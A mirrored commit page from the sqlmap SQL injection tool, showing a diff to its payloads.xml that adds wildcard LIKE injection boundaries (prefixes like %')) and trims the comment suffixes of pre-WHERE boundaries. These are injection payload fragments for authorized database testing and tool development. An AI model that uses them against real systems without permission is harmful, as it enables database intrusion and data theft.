sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-07-15 02:32:31 +03:00
Code Issues Packages Projects Releases Wiki Activity

adding revisited wildcard LIKE payloads

Browse Source
This commit is contained in:
Miroslav Stampar 2012-05-21 21:49:54 +00:00
parent 602369c762
commit 3a9e266d78
1 changed files with 42 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

48
xml/payloads.xml
View File

@ -446,6 +446,42 @@ Formats:
<prefix>"</prefix> <prefix>"</prefix>
<suffix>AND "[RANDSTR]" LIKE "[RANDSTR]</suffix> <suffix>AND "[RANDSTR]" LIKE "[RANDSTR]</suffix>
</boundary> </boundary>
<boundary>
<level>2</level>
<clause>1</clause>
<where>1,2</where>
<ptype>2</ptype>
<prefix>%')</prefix>
<suffix></suffix>
</boundary>
<boundary>
<level>3</level>
<clause>1</clause>
<where>1,2</where>
<ptype>2</ptype>
<prefix>%'))</prefix>
<suffix></suffix>
</boundary>
<boundary>
<level>4</level>
<clause>1</clause>
<where>1,2</where>
<ptype>2</ptype>
<prefix>%')))</prefix>
<suffix></suffix>
</boundary>
<boundary>
<level>1</level>
<clause>1</clause>
<where>1,2</where>
<ptype>2</ptype>
<prefix>%'</prefix>
<suffix></suffix>
</boundary>
<!-- End of WHERE/HAVING clause boundaries --> <!-- End of WHERE/HAVING clause boundaries -->
@ -456,7 +492,7 @@ Formats:
<where>1,2</where> <where>1,2</where>
<ptype>2</ptype> <ptype>2</ptype>
<prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix> <prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- AND ('[RANDSTR]'='[RANDSTR]</suffix> <suffix>-- </suffix>
</boundary> </boundary>
<boundary> <boundary>
@ -465,7 +501,7 @@ Formats:
<where>1,2</where> <where>1,2</where>
<ptype>2</ptype> <ptype>2</ptype>
<prefix>") WHERE [RANDNUM]=[RANDNUM]</prefix> <prefix>") WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- AND ("[RANDSTR]"="[RANDSTR]</suffix> <suffix>-- </suffix>
</boundary> </boundary>
<boundary> <boundary>
@ -474,7 +510,7 @@ Formats:
<where>1,2</where> <where>1,2</where>
<ptype>1</ptype> <ptype>1</ptype>
<prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix> <prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- AND ([RANDNUM1]=[RANDNUM1]</suffix> <suffix>-- </suffix>
</boundary> </boundary>
<boundary> <boundary>
@ -483,7 +519,7 @@ Formats:
<where>1,2</where> <where>1,2</where>
<ptype>2</ptype> <ptype>2</ptype>
<prefix>' WHERE [RANDNUM]=[RANDNUM]</prefix> <prefix>' WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- AND '[RANDSTR]'='[RANDSTR]</suffix> <suffix>-- </suffix>
</boundary> </boundary>
<boundary> <boundary>
@ -492,7 +528,7 @@ Formats:
<where>1,2</where> <where>1,2</where>
<ptype>4</ptype> <ptype>4</ptype>
<prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix> <prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- AND "[RANDSTR]"="[RANDSTR]</suffix> <suffix>-- </suffix>
</boundary> </boundary>
<boundary> <boundary>
@ -501,7 +537,7 @@ Formats:
<where>1,2</where> <where>1,2</where>
<ptype>1</ptype> <ptype>1</ptype>
<prefix> WHERE [RANDNUM]=[RANDNUM]</prefix> <prefix> WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- AND [RANDNUM1]=[RANDNUM1]</suffix> <suffix>-- </suffix>
</boundary> </boundary>
<!-- End of pre-WHERE generic boundaries --> <!-- End of pre-WHERE generic boundaries -->